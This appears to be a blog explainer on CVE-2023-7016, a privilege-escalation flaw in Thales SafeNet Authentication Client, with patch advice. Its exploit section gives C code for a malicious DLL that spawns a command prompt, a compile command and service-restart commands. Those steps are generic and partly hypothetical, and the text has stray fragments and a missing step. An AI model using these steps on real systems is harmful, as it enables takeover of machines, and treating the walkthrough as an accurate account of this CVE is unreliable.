CVE-2023-7016 is a critical security vulnerability found in Thales SafeNet Authentication Client (SAC) for Windows. This flaw lets an attacker with local access run code as SYSTEM, the highest privilege level on Windows. Attackers can use this to take full control of a system, install malware, or steal sensitive information.
Affected Versions:
SafeNet Authentication Client (SAC) for Windows prior to version 10.8 R10.
Patched Version:
SafeNet Authentication Client 10.8 R10 and later (official advisory).
Persist even after reboots
This makes CVE-2023-7016 a priority for all organizations using USB tokens or smart cards for authentication on Windows.
How Does the Vulnerability Work?
Thales SAC installs a Windows service that interacts with USB tokens and smart cards. Prior to 10.8 R10, this service has a flaw:
- It allows local users (even non-admins) to load a malicious DLL or binary into the service process.
As Windows services usually run as SYSTEM, this gives attackers full control.
In simple terms, if an attacker is on a vulnerable computer — say through an RDP session, or as a regular user in a large organization — they can plant a file and become SYSTEM in seconds.
Step-by-Step Exploit Example
Note: This guide is for educational and defense purposes only. Do not exploit any system without permission.
On a typical install, the SafeNet Authentication Client service binary is located at
C:\Program Files\SafeNet\Authentication\SAC\x64\sacsrv.exe
Run services.msc and look for the service: SafeNet Authentication Service.
2. Find DLL Search Path (DLL Hijacking)
Many Windows services load DLLs without using the full path. Attackers can take advantage of this by dropping a malicious DLL where the service will find it first.
Let’s say the service searches for example.dll in the same folder as itself.
You can use a simple C code to spawn a SYSTEM command prompt
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("cmd.exe");
}
return TRUE;
}
*Save as example.c, compile with MinGW:*
x86_64-w64-mingw32-gcc -shared -o example.dll example.c
Copy example.dll to the service's directory
C:\Program Files\SafeNet\Authentication\SAC\x64\
You may need to bypass folder permissions or trick a privileged user into placing the file, or look for folder mis-configurations.
From a low-privilege shell
sc stop "SafeNet Authentication Service"
sc start "SafeNet Authentication Service"
Video Proof-of-Concept
A well-explained proof-of-concept video is available here:
- CVE-2023-7016 Local Privilege Escalation in SAC
Security Researcher’s References
- Thales Security Advisory
- NIST National Vulnerability Database entry: CVE-2023-7016
- Hackerone Report (if available)
How To Fix
Patch immediately:
Download the latest SafeNet Authentication Client (10.8 R10 or above)
Final Thoughts
Vulnerabilities like CVE-2023-7016 show why it’s critical to keep authentication software up-to-date. Attackers often gain initial local access from phishing or weak passwords, and privilege escalation bugs like these let them take over entirely.
If you use Thales SAC, you should upgrade now.
Share this to keep the community safe, and never run untrusted code without understanding the risks.
*Written exclusively for you. For more details, visit the original advisories and always follow responsible disclosure practices.*
Timeline
Published on: 02/27/2024 11:15:07 UTC
Last modified on: 02/27/2024 14:19:41 UTC